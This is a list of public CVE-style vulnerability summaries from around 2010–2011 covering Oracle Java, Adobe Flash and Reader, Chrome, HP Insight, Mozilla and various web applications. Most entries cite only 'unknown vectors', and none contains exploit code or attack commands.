Unspecified vulnerability in the backup-archive client in IBM Tivoli Storage Manager (TSM) 5.3.x before 5.3.6.10, 5.4.x before 5.4.3.4, 5.5.x before 5.5.3, 6.1.x before 6.1.4, and 6.2.x before 6.2.2 on Unix and Linux allows local users to overwrite arbitrary files via unknown vectors.
Multiple unspecified vulnerabilities in IBM Rational ClearQuest 7.0.x before 7.0.1.11, 7.1.1.x before 7.1.1.4, and 7.1.2.x before 7.1.2.1 allow attackers to have an unknown impact via vectors related to third-party .ocx files.
Untrusted search path vulnerability in Ecava IntegraXor 3.6.4000.0 allows local users to gain privileges via a Trojan horse dwmapi.dll file in the current working directory.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Opera before 11.00 has unknown impact and attack vectors, related to "a high severity issue."
Google Chrome before 8.0.552.224 and Chrome OS before 8.0.552.343 do not properly perform cursor handling, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to "stale pointers."
Unspecified vulnerability in CrawlTrack before 3.2.7, when a public stats page is provided, allows remote attackers to execute arbitrary PHP code via unknown vectors.
Unspecified vulnerability in Movable Type 4.x before 4.35 and 5.x before 5.04 has unknown impact and attack vectors related to the "dynamic publishing error message."
Multiple unspecified vulnerabilities in Movable Type 4.x before 4.35 and 5.x before 5.04 have unknown impact and attack vectors related to the (1) mt:AssetProperty and (2) mt:EntryFlag tags.
Multiple SQL injection vulnerabilities in contact.php in MRCGIGUY (MCG) FreeTicket 1.0.0, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) name, (2) email, (3) subject, and (4) message parameters in a sendmess action.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Google Chrome before 8.0.552.215 allows remote attackers to bypass the pop-up blocker via unknown vectors.
Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to Deployment, a different vulnerability than CVE-2010-4447.
Unspecified vulnerability in the Java DB component in Oracle Java SE and Java for Business 6 Update 23, and, and earlier allows local users to affect confidentiality via unknown vectors related to Security, a similar vulnerability to CVE-2009-4269.
Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Sound and unspecified APIs, a different vulnerability than CVE-2010-4454 and CVE-2010-4462.
Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, and 5.0 Update 27 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to 2D.  NOTE: the previous information was obtained from the February 2011 CPU.  Oracle has not commented on claims from a downstream vendor that this issue is related to the exposure of system properties via vectors related to Font.createFont and exception text.
Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23, and, and earlier allows remote attackers to affect availability via unknown vectors related to JAXP and unspecified APIs.  NOTE: the previous information was obtained from the February 2011 CPU.  Oracle has not commented on claims from a downstream vendor that this issue is related to "Features set on SchemaFactory not inherited by Validator."
Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to HotSpot.  NOTE: the previous information was obtained from the February 2011 CPU.  Oracle has not commented on claims from a downstream vendor that this issue is heap corruption related to the Verifier and "backward jsrs."
Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, and 5.0 Update 27 and earlier, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality and integrity via unknown vectors related to JDBC.
Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 10 through 6 Update 23 allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier for Windows, Solaris, and, Linux; 5.0 Update 27 and earlier for Windows; and 1.4.2_29 and earlier for Windows allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to Deployment.
Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Swing.  NOTE: the previous information was obtained from the February 2011 CPU.  Oracle has not commented on claims from a downstream vendor that this issue is related to the lack of framework support by AWT event dispatch, and/or "clipboard access in Applets."
Unspecified vulnerability in Oracle Sun Convergence 1.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Webmail.
Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 21 through 6 Update 23 allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Sound and unspecified APIs, a different vulnerability than CVE-2010-4454 and CVE-2010-4473.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS component in Oracle PeopleSoft and JDEdwards Suite 8.9 Bundle #23, 9.0 Bundle #14, and 9.1 Bundle #4 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to ePerformance.
Unspecified vulnerability in Oracle Solaris 10 allows local users to affect confidentiality and integrity via unknown vectors related to Fault Manager Daemon.
Unspecified vulnerability in Oracle Solaris 11 Express allows local users to affect availability via unknown vectors related to SCTP and Kernel/sockfs.
Unspecified vulnerability in Oracle Sun Java System Communications Express 6.2 and 6.3 allows remote attackers to affect integrity via unknown vectors related to Web Mail.
Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 11.1.1.2 and 11.1.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Apache Plugin.
Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Sound and unspecified APIs, a different vulnerability than CVE-2010-4462 and CVE-2010-4473.
Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 7.0.7, 8.1.6, 9.0, 9.1, 9.2.4, 10.0.2, 10.3.2, and 10.3.3 allows remote attackers to affect integrity via unknown vectors related to Servlet Container.
Unspecified vulnerability in the Deployment component in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier for Windows, when using Java Update, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Install.
Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier for Solaris and Linux; 5.0 Update 27 and earlier for Solaris and Linux; and 1.4.2_29 and earlier for Solaris and Linux allows local standalone applications to affect confidentiality, integrity, and availability via unknown vectors related to Launcher.  NOTE: the previous information was obtained from the February 2011 CPU.  Oracle has not commented on claims from a downstream vendor that this issue is an untrusted search path vulnerability involving an empty LD_LIBRARY_PATH environment variable.
Unspecified vulnerability in the Audit Vault component in Oracle Audit Vault 10.2.3.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: the previous information was obtained from the January 2011 CPU.  Oracle has not commented on claims from a reliable third party coordinator that this issue is related to a crafted parameter in an action.execute request to the av component on TCP port 5700.
Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect integrity via unknown vectors related to Networking.  NOTE: the previous information was obtained from the February 2011 CPU.  Oracle has not commented on claims from a downstream vendor that this issue involves "DNS cache poisoning by untrusted applets."
Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to Deployment, a different vulnerability than CVE-2010-4475.
Unspecified vulnerability in Oracle Solaris 11 Express allows local users to affect availability via unknown vectors related to RDS and Kernel/InfiniBand.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS component in Oracle PeopleSoft and JDEdwards Suite 9.0 Bundle #14 and 9.1 Bundle #4 allows remote authenticated users to affect confidentiality via unknown vectors related to Talent Acquisition Manager.
Unspecified vulnerability in Oracle Sun Java System Access Manager and Oracle OpenSSO 7, 7.1, and 8 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in Oracle Solaris 10 and 11 Express allows local users to affect availability via unknown vectors related to the Kernel.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS component in Oracle PeopleSoft and JDEdwards Suite 9.1 Bundle #4 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Talent Acquisition Manager.
Unspecified vulnerability in Oracle 10 and 11 Express allows local users to affect availability via unknown vectors related to the Kernel.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS component in Oracle PeopleSoft and JDEdwards Suite 9.0 Bundle #14 and 9.1 Bundle #4 allows remote authenticated users to affect confidentiality via unknown vectors related to eProfile - Manager Desktop.
Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 9.0, 9.1, 9.2.4, 10.0.2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Servlet Container.
Unspecified vulnerability in Oracle Sun Management Center (SunMC) 4.0 allows remote attackers to affect confidentiality via unknown vectors related to Web Console.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft and JDEdwards Suite 8.50.0 through 8.50.14 and 8.51.0 through 8.51.04 allows remote authenticated users to affect confidentiality via unknown vectors related to Portal.
Unspecified vulnerability in Oracle Solaris 10 allows remote attackers to affect confidentiality via unknown vectors related to Ethernet and the Driver sub-component.
Unspecified vulnerability in the Oracle Transportation Manager component in Oracle Supply Chain Products Suite 5.5.06, 6.0, 6.1, and 6.2 allows remote authenticated users to affect confidentiality via unknown vectors related to UI Infrastructure.
Unspecified vulnerability in Oracle Sun Java System Portal Server 7.1 and 7.2 allows local users to affect confidentiality via unknown vectors related to Proxy.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS component in Oracle PeopleSoft and JDEdwards Suite 9.1 Update 2010-F allows remote authenticated users to affect confidentiality via unknown vectors related to Absence Management.
Unspecified vulnerability in the Agile Core component in Oracle Supply Chain Products Suite 9.3.0.2 and 9.3.1 allows remote authenticated users to affect integrity via unknown vectors related to Web Client, a different vulnerability than CVE-2010-3505.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS component in Oracle PeopleSoft and JDEdwards Suite 9.0 Update 2010-F allows remote authenticated users to affect confidentiality via unknown vectors related to Absence Management.
Unspecified vulnerability in the Oracle BI Publisher component in Oracle Fusion Middleware 10.1.3.4.0, 10.1.3.4.1, and 11.1.1.3 allows remote authenticated users to affect integrity via unknown vectors related to Web Server.
Unspecified vulnerability in the Oracle BI Publisher component in Oracle Fusion Middleware 10.1.3.3.2, 10.1.3.4.0, and 10.1.3.4.1 allows remote authenticated users to affect integrity via unknown vectors related to Web Server.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft and JDEdwards Suite 8.49.0 through 8.49.29, 8.50.0 through 8.50.14, and 8.51.0 through 8.51.04 allows remote attackers to affect availability via unknown vectors related to the Security sub-component.
Unspecified vulnerability in the Cluster Verify Utility component in Oracle Database Server 10.2.0.4, 10.2.0.5, 11.1.0.7, and 11.2.0.1, when running on Windows, allows local users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
Unspecified vulnerability in the Database Vault component in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, and 11.2.0.1 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Database Vault component in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, and 11.2.0.1 allows local users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise CRM component in Oracle PeopleSoft and JDEdwards Suite 9.0 Bundle #31 and 9.1 Bundle #6 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Order Capture.
Unspecified vulnerability in the Services for Beehive component in Oracle Fusion Middleware 2.0.1.0, 2.0.1.1, 2.0.1.2, 2.0.1.2.1, and 2.0.1.3 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: the previous information was obtained from the January 2011 CPU.  Oracle has not commented on claims from a reliable third party coordinator that voice-servlet/prompt-qa/Index.jspf does not properly handle null (%00) bytes in the evaluation parameter that is used in a filename, which allows attackers to create a file with an executable extension and execute arbitrary JSP code.
Unspecified vulnerability in the Oracle GoldenGate Veridata component in Oracle Fusion Middleware 3.0.0.4 allows remote attackers to affect availability via unknown vectors related to Server.  NOTE: the previous information was obtained from the January 2011 CPU.  Oracle has not commented on claims from a reliable third party researcher that this is a buffer overflow via a crafted XML soap request and a value that does not contain the expected 0x20 terminator character.
Unspecified vulnerability in Oracle Solaris 8, 9, and 10 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to libc.
Unspecified vulnerability in Oracle VM VirtualBox 4.0 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Extensions.
Unspecified vulnerability in the Scheduler Agent component in Oracle Database Server 11.1.0.7 and 11.2.0.1 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in CGI.pm 3.50 and earlier allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via unknown vectors.  NOTE: this issue exists because of an incomplete fix for CVE-2010-2761.
Cross-site scripting (XSS) vulnerability in url-gateway.php in Jurpopage 0.2.0 allows remote attackers to inject arbitrary web script or HTML via the url parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple SQL injection vulnerabilities in index.php in Jurpopage 0.2.0 allow remote attackers to execute arbitrary SQL commands via the (1) note and (2) pg parameters, different vectors than CVE-2010-4359. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the mod_mono module for XSP in Mono 2.8.x before 2.8.2 allows remote attackers to obtain the source code for .aspx (ASP.NET) applications via unknown vectors related to an "unloading bug."
Unspecified vulnerability in Web Services in IBM ENOVIA 6 has unknown impact and attack vectors, related to a system that becomes "exposed to the internet."
Google Chrome before 7.0.517.44 does not properly handle the data types of event objects, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
WebKit, as used in Google Chrome before 7.0.517.44, webkitgtk before 1.2.6, and other products, accesses a frame object after this object has been destroyed, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
The Shockwave 3d Asset module in Adobe Shockwave Player before 11.5.9.620 does not properly validate unspecified input data, which allows attackers to execute arbitrary code via unknown vectors.
The TextXtra module in Adobe Shockwave Player before 11.5.9.620 does not properly validate unspecified input data, which allows attackers to execute arbitrary code via unknown vectors.
The dirapi.dll module in Adobe Shockwave Player before 11.5.9.620 does not properly validate unspecified input data, which allows attackers to execute arbitrary code via unknown vectors.
Adobe Shockwave Player before 11.5.9.620 does not properly validate unspecified input data, which allows attackers to execute arbitrary code via unknown vectors.
Untrusted search path vulnerability in the Data Access Objects (DAO) library (dao360.dll) in Microsoft Windows XP Professional SP3, Windows Server 2003 R2 Enterprise Edition SP3, Windows Vista Business SP1, and Windows 7 Professional allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse msjet49.dll that is located in the same folder as a file that is processed by dao360.dll.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in HP StorageWorks Storage Mirroring 5.x before 5.2.2.1771.2 allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in HP OpenVMS 8.3, 8.3-1H1, and 8.4 on the Itanium platform on Integrity servers allows local users to gain privileges or cause a denial of service via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in HP Insight Control for Linux before 6.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in HP Insight Orchestration before 6.2 allows remote attackers to bypass intended access restrictions, and obtain sensitive information or modify data, via unknown vectors.
Unspecified vulnerability in HP Insight Orchestration before 6.2 allows remote attackers to read arbitrary files via unknown vectors.
Unspecified vulnerability in HP Insight Managed System Setup Wizard before 6.2 allows remote attackers to read arbitrary files via unknown vectors.
Unspecified vulnerability in HP Insight Recovery before 6.2 allows remote attackers to read arbitrary files via unknown vectors.
Unspecified vulnerability in HP Insight Control Performance Management before 6.1 update 2 allows remote attackers to read arbitrary files via unknown vectors.
share/ma/keys_for_user in Monkeysphere 0.31 and 0.32 allows local users to execute arbitrary code via unknown manipulations related to the "monkeysphere-authentication keys-for-user" command.
Unspecified vulnerability in Google Chrome before 7.0.517.41 allows remote attackers to bypass the pop-up blocker via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in HP Insight Control Performance Management before 6.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in HP Insight Control Performance Management before 6.2 allows remote authenticated users to gain privileges via unknown vectors.
Unspecified vulnerability in HP Storage Essentials before 6.3.0, when LDAP authentication is enabled, allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via unknown vectors.
Unspecified vulnerability in LoadRunner Web Tours 9.10 in HP LoadRunner 9.1 and earlier allows remote attackers to cause a denial of service, and possibly obtain sensitive information or modify data, via unknown vectors.
Unspecified vulnerability in the camera application in HP Palm webOS 1.4.1 allows local users to overwrite arbitrary files via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in HP Insight Control Power Management before 6.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in HP Insight Control Server Migration before 6.2 allows remote attackers to obtain sensitive information or modify data via unknown vectors.
Unspecified vulnerability in HP Insight Control Server Migration before 6.2 allows remote authenticated users to gain privileges via unknown vectors.
Unspecified vulnerability in HP Virtual Server Environment before 6.2 allows remote attackers to read arbitrary files via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in HP Insight Control Virtual Machine Management before 6.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in HP Insight Control Virtual Machine Management before 6.2 allows remote attackers to bypass intended access restrictions and cause a denial of service via unknown vectors.
Unspecified vulnerability in HP Virtual Connect Enterprise Manager (VCEM) 6.0 and 6.1 allows remote attackers to read arbitrary files via unknown vectors.
Cross-site scripting (XSS) vulnerability in multiple Rocomotion products, including P board 1.18 and other versions, P forum 1.30 and earlier, P up board 1.38 and other versions, P diary R 1.13 and earlier, P link 1.11 and earlier, P link compact 1.04 and earlier, pplog 3.31 and earlier, pplog2 3.37 and earlier, PM bbs 1.07 and earlier, PM up bbs 1.08 and earlier, and PM forum 1.18 and earlier, allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
SQL injection vulnerability in MODx Evolution 1.0.4 and earlier allows remote attackers to execute arbitrary SQL commands via unknown vectors related to AjaxSearch.
The supportconfig script in supportutils in SUSE Linux Enterprise 11 SP1 and 10 SP3 does not "disguise passwords" in configuration files, which has unknown impact and attack vectors.
Unspecified vulnerability in Microsoft Windows on 32-bit platforms allows local users to gain privileges via unknown vectors, as exploited in the wild in July 2010 by the Stuxnet worm, and identified by Microsoft researchers and other researchers.
Unspecified vulnerability in Microsoft Windows on 32-bit platforms allows local users to gain privileges via unknown vectors, as exploited in the wild in July 2010 by the Stuxnet worm, and identified by Kaspersky Lab researchers and other researchers.
Cross-site request forgery (CSRF) vulnerability in CMS Made Simple 1.8.1 and earlier allows remote attackers to hijack the authentication of administrators for requests that reset the administrative password. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Mozilla Firefox 3.5.x before 3.5.16, Thunderbird before 3.0.11, and SeaMonkey before 2.0.11 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Unspecified vulnerability in Mozilla Firefox 3.6.x before 3.6.13 and Thunderbird 3.1.x before 3.1.7 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 3.5.16 and 3.6.x before 3.6.13, Thunderbird before 3.0.11 and 3.1.x before 3.1.7, and SeaMonkey before 2.0.11 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Unspecified vulnerability in IBM Tivoli Storage Manager (TSM) FastBack 5.5.0.0 through 5.5.6.0 and 6.1.0.0 through 6.1.0.1 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-700.  NOTE: this might overlap CVE-2010-3058 or CVE-2010-3059.
Stack-based buffer overflow in the RichFX component in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.4, and RealPlayer Enterprise 2.1.2 allows remote attackers to have an unspecified impact via unknown vectors.
The Gfx::getPos function in the PDF parser in xpdf before 3.02pl5, poppler 0.8.7 and possibly other versions up to 0.15.1, CUPS, kdegraphics, and possibly other products allows context-dependent attackers to cause a denial of service (crash) via unknown vectors that trigger an uninitialized pointer dereference.
Multiple cross-site scripting (XSS) vulnerabilities in TYPO3 CMS 4.1.x before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4, and 4.4.x before 4.4.1 allow remote authenticated backend users to inject arbitrary web script or HTML via unspecified parameters to the extension manager, or unspecified parameters to unknown backend forms.
Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to cause a denial of service via unknown vectors, a different vulnerability than CVE-2010-3656.
Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to cause a denial of service via unknown vectors, a different vulnerability than CVE-2010-3657.
Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, and CVE-2010-3650.
Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, and CVE-2010-3652.
Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3650, and CVE-2010-3652.
Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652.
Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652.
Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652.
Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652.
Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652.
Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652.
Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652.
Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652.
Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652.
Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors.
Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Mac OS X, when Safari is used, allows attackers to obtain sensitive information via unknown vectors.
Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, does not properly handle unspecified encodings during the parsing of a cross-domain policy file, which allows remote web servers to bypass intended access restrictions via unknown vectors.
Unspecified vulnerability in the edge process in Adobe Flash Media Server (FMS) 3.0.x before 3.0.7, 3.5.x before 3.5.5, and 4.0.x before 4.0.1 allows attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors.
Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to execute arbitrary code via unknown vectors.
